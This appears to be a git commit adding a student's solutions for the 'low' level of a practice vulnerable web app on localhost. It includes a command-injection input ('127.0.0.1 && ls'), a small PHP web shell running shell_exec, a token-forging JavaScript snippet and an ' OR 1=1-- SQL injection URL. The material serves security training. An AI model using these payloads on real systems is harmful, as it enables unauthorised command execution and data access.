feat: 🚧 Starting low level

This commit is contained in:
Louis Gallet 2023-12-08 10:02:50 +01:00
commit de2700067e
Signed by: lgallet
SSH Key Fingerprint: SHA256:qnW7pk4EoMRR0UftZLZQKSMUImbEFsiruLC7jbCHJAY
5 changed files with 9 additions and 0 deletions

BIN
.DS_Store vendored Normal file

Binary file not shown.

View File

@ -0,0 +1 @@
127.0.0.1 && ls

View File

@ -0,0 +1,4 @@
<?php
$output = shell_exec('ls');
echo "<pre>$output</pre>";
?>

3
Javascript/low.js Normal file
View File

@ -0,0 +1,3 @@
const phrase = document.getElementById("phrase").value;
const token = md5(rot13(phrase));
console.log(token);

1
SQL Injection/low.txt Normal file
View File

@ -0,0 +1 @@
Full url : http://localhost:4280/vulnerabilities/sqli/?id=test%27+OR+1=1--%27&Submit=Submit#